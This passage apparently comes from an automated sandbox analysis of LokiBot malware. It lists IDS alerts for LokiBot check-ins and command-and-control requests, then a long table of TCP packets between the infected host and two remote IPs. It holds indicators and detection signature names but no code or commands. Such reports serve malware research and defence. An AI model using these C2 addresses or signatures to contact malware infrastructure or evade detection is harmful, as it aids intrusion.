                                      07/15/21-12:45:05.460171TCP2025381ET TROJAN LokiBot Checkin4986980192.168.2.3104.21.6.222
                                      07/15/21-12:45:06.039548TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.3104.21.6.222
                                      07/15/21-12:45:06.039548TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.3104.21.6.222
                                      07/15/21-12:45:06.039548TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.3104.21.6.222

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 15, 2021 12:43:47.874182940 CEST4972580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:47.900007963 CEST8049725104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:47.903620005 CEST4972580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:47.907135010 CEST4972580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:47.925750971 CEST8049725104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:47.926115990 CEST4972580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:47.943806887 CEST8049725104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:48.175553083 CEST8049725104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:48.175595045 CEST8049725104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:48.175771952 CEST4972580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:48.175893068 CEST4972580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:48.193553925 CEST8049725104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:48.417444944 CEST4972680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:48.437190056 CEST8049726172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:48.437299013 CEST4972680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:48.439977884 CEST4972680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:48.459548950 CEST8049726172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:48.459628105 CEST4972680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:48.480252981 CEST8049726172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:48.712553978 CEST8049726172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:48.712579012 CEST8049726172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:48.712665081 CEST4972680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:48.712749958 CEST4972680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:48.732243061 CEST8049726172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:48.848375082 CEST4972780192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:48.866223097 CEST8049727104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:48.866307974 CEST4972780192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:48.868817091 CEST4972780192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:48.886409998 CEST8049727104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:48.886526108 CEST4972780192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:48.904084921 CEST8049727104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:49.149667978 CEST8049727104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:49.149837971 CEST4972780192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:49.149949074 CEST8049727104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:49.149992943 CEST4972780192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:49.167228937 CEST8049727104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:49.467299938 CEST4972880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:49.485157967 CEST8049728172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:49.485326052 CEST4972880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:49.489130974 CEST4972880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:49.506879091 CEST8049728172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:49.507272005 CEST4972880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:49.525001049 CEST8049728172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:49.749449015 CEST8049728172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:49.749706030 CEST8049728172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:49.749768019 CEST4972880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:49.750061989 CEST4972880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:49.768420935 CEST8049728172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:50.109433889 CEST4972980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.127305031 CEST8049729172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:50.127506971 CEST4972980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.130475044 CEST4972980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.148061037 CEST8049729172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:50.148205042 CEST4972980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.165942907 CEST8049729172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:50.392189980 CEST8049729172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:50.392213106 CEST8049729172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:50.392297983 CEST4972980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.392405033 CEST4972980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.409981966 CEST8049729172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:50.927072048 CEST4973080192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.945033073 CEST8049730172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:50.945312977 CEST4973080192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.949748993 CEST4973080192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.967616081 CEST8049730172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:50.967760086 CEST4973080192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:50.985542059 CEST8049730172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:51.218986034 CEST8049730172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:51.219010115 CEST8049730172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:51.219068050 CEST4973080192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:51.219104052 CEST4973080192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:51.237133980 CEST8049730172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:51.512200117 CEST4973180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:51.532174110 CEST8049731172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:51.533006907 CEST4973180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:51.536429882 CEST4973180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:51.556353092 CEST8049731172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:51.558626890 CEST4973180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:51.580034018 CEST8049731172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:51.814811945 CEST8049731172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:51.814893007 CEST8049731172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:51.814963102 CEST4973180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:51.814996958 CEST4973180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:51.835320950 CEST8049731172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:52.642021894 CEST4973280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:52.659996033 CEST8049732172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:52.660129070 CEST4973280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:52.663590908 CEST4973280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:52.681987047 CEST8049732172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:52.682116032 CEST4973280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:52.699805975 CEST8049732172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:52.925607920 CEST8049732172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:52.925640106 CEST8049732172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:52.925757885 CEST4973280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:52.925817013 CEST4973280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:52.943612099 CEST8049732172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:54.171889067 CEST4973380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:54.191557884 CEST8049733104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:54.191791058 CEST4973380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:54.194818020 CEST4973380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:54.214323044 CEST8049733104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:54.214418888 CEST4973380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:54.234164953 CEST8049733104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:54.474117994 CEST8049733104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:54.474139929 CEST8049733104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:54.474211931 CEST4973380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:54.474256039 CEST4973380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:54.493953943 CEST8049733104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:54.744553089 CEST4973480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:54.762343884 CEST8049734172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:54.762459040 CEST4973480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:54.766119957 CEST4973480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:54.783817053 CEST8049734172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:54.786243916 CEST4973480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:54.804404974 CEST8049734172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:55.033678055 CEST8049734172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:55.033859968 CEST4973480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:55.034018040 CEST8049734172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:55.034533024 CEST4973480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:55.051565886 CEST8049734172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:55.257456064 CEST4973580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:55.277106047 CEST8049735104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:55.277431965 CEST4973580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:55.280241013 CEST4973580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:55.299825907 CEST8049735104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:55.301932096 CEST4973580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:55.321484089 CEST8049735104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:55.547267914 CEST8049735104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:55.547312021 CEST8049735104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:55.553834915 CEST4973580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:55.553879023 CEST4973580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:55.588874102 CEST8049735104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:55.973967075 CEST4973680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:55.992010117 CEST8049736172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:55.992229939 CEST4973680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:55.996022940 CEST4973680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:56.014065981 CEST8049736172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:56.016937017 CEST4973680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:56.034782887 CEST8049736172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:56.263892889 CEST8049736172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:56.263921976 CEST8049736172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:56.264002085 CEST4973680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:56.264059067 CEST4973680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:56.282553911 CEST8049736172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:56.531970024 CEST4973880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:56.550117970 CEST8049738104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:56.550365925 CEST4973880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:56.554640055 CEST4973880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:56.572381020 CEST8049738104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:56.573070049 CEST4973880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:56.591552019 CEST8049738104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:56.816598892 CEST8049738104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:56.816864967 CEST4973880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:56.818658113 CEST8049738104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:56.818753004 CEST4973880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:56.834467888 CEST8049738104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.110671997 CEST4973980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.128431082 CEST8049739104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.128727913 CEST4973980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.132747889 CEST4973980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.150758028 CEST8049739104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.150979996 CEST4973980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.168946028 CEST8049739104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.406949043 CEST8049739104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.407239914 CEST4973980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.407721996 CEST8049739104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.407843113 CEST4973980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.425648928 CEST8049739104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.696851015 CEST4974080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.716505051 CEST8049740104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.716703892 CEST4974080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.720314026 CEST4974080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.740127087 CEST8049740104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.740231991 CEST4974080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.759840965 CEST8049740104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.994368076 CEST8049740104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.994474888 CEST8049740104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:57.994558096 CEST4974080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:57.995037079 CEST4974080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:43:58.014516115 CEST8049740104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:43:58.236247063 CEST4974180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.256011963 CEST8049741172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:58.256175041 CEST4974180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.273469925 CEST4974180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.293189049 CEST8049741172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:58.293314934 CEST4974180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.313029051 CEST8049741172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:58.619349003 CEST8049741172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:58.619411945 CEST8049741172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:58.619785070 CEST4974180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.619827986 CEST4974180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.640259981 CEST8049741172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:58.893914938 CEST4974280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.911483049 CEST8049742172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:58.911942005 CEST4974280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.915357113 CEST4974280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.932883024 CEST8049742172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:58.933010101 CEST4974280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:58.950599909 CEST8049742172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.182940960 CEST8049742172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.183140039 CEST8049742172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.183168888 CEST4974280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:59.183247089 CEST4974280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:59.200754881 CEST8049742172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.427786112 CEST4974380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:59.447633982 CEST8049743172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.447742939 CEST4974380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:59.452094078 CEST4974380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:59.471703053 CEST8049743172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.471790075 CEST4974380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:59.491656065 CEST8049743172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.759763002 CEST8049743172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.760199070 CEST4974380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:59.760905027 CEST8049743172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.761600018 CEST4974380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:43:59.780560017 CEST8049743172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:43:59.993160009 CEST4974480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:00.013874054 CEST8049744104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:00.014141083 CEST4974480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:00.017564058 CEST4974480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:00.038758993 CEST8049744104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:00.038944960 CEST4974480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:00.059775114 CEST8049744104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:00.294830084 CEST8049744104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:00.294861078 CEST8049744104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:00.294995070 CEST4974480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:00.295233965 CEST4974480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:00.314899921 CEST8049744104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:00.548995018 CEST4974580192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:00.566844940 CEST8049745172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:00.567009926 CEST4974580192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:00.573297977 CEST4974580192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:00.590965033 CEST8049745172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:00.591094017 CEST4974580192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:00.608880997 CEST8049745172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:00.839406013 CEST8049745172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:00.839431047 CEST8049745172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:00.839566946 CEST4974580192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:00.839616060 CEST4974580192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:00.860985041 CEST8049745172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:01.057214022 CEST4974680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:01.074799061 CEST8049746104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:01.075016975 CEST4974680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:01.084925890 CEST4974680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:01.102615118 CEST8049746104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:01.102716923 CEST4974680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:01.120397091 CEST8049746104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:01.436127901 CEST8049746104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:01.436165094 CEST8049746104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:01.441576958 CEST4974680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:01.441956997 CEST4974680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:01.461476088 CEST8049746104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:01.673065901 CEST4974780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:01.690862894 CEST8049747172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:01.691080093 CEST4974780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:01.694096088 CEST4974780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:01.813358068 CEST8049747172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:01.814182043 CEST4974780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:01.832016945 CEST8049747172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.080519915 CEST8049747172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.080552101 CEST8049747172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.080779076 CEST4974780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:02.080898046 CEST4974780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:02.098370075 CEST8049747172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.308316946 CEST4974880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:02.328144073 CEST8049748172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.328314066 CEST4974880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:02.339421034 CEST4974880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:02.359076977 CEST8049748172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.359179974 CEST4974880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:02.378803968 CEST8049748172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.618393898 CEST8049748172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.618486881 CEST8049748172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.618674040 CEST4974880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:02.618733883 CEST4974880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:02.638334990 CEST8049748172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:02.960118055 CEST4974980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:02.977994919 CEST8049749104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:02.978143930 CEST4974980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:02.980963945 CEST4974980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:02.998533964 CEST8049749104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:02.998627901 CEST4974980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:03.017359018 CEST8049749104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:03.448837042 CEST8049749104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:03.448884964 CEST8049749104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:03.449163914 CEST4974980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:03.449242115 CEST4974980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:03.467061043 CEST8049749104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:03.696811914 CEST4975080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:03.716636896 CEST8049750104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:03.716885090 CEST4975080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:03.732526064 CEST4975080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:03.752722025 CEST8049750104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:03.752901077 CEST4975080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:03.772687912 CEST8049750104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:03.999746084 CEST8049750104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:03.999794960 CEST8049750104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:03.999946117 CEST4975080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:03.999988079 CEST4975080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:04.020142078 CEST8049750104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:04.258692026 CEST4975180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:04.276462078 CEST8049751172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:04.276611090 CEST4975180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:04.280298948 CEST4975180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:04.298015118 CEST8049751172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:04.298085928 CEST4975180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:04.315983057 CEST8049751172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:04.548019886 CEST8049751172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:04.548120022 CEST8049751172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:04.548187017 CEST4975180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:04.548213005 CEST4975180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:04.565970898 CEST8049751172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:04.770345926 CEST4975280192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:04.790110111 CEST8049752104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:04.790328026 CEST4975280192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:04.800228119 CEST4975280192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:04.820570946 CEST8049752104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:04.820697069 CEST4975280192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:04.841666937 CEST8049752104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:05.169147968 CEST8049752104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:05.169203043 CEST8049752104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:05.169297934 CEST4975280192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:05.169346094 CEST4975280192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:05.188977957 CEST8049752104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:05.414273977 CEST4975380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:05.432008982 CEST8049753104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:05.432168007 CEST4975380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:05.436605930 CEST4975380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:05.454392910 CEST8049753104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:05.454508066 CEST4975380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:05.472161055 CEST8049753104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:05.777416945 CEST8049753104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:05.777540922 CEST8049753104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:05.777671099 CEST4975380192.168.2.3104.21.6.222
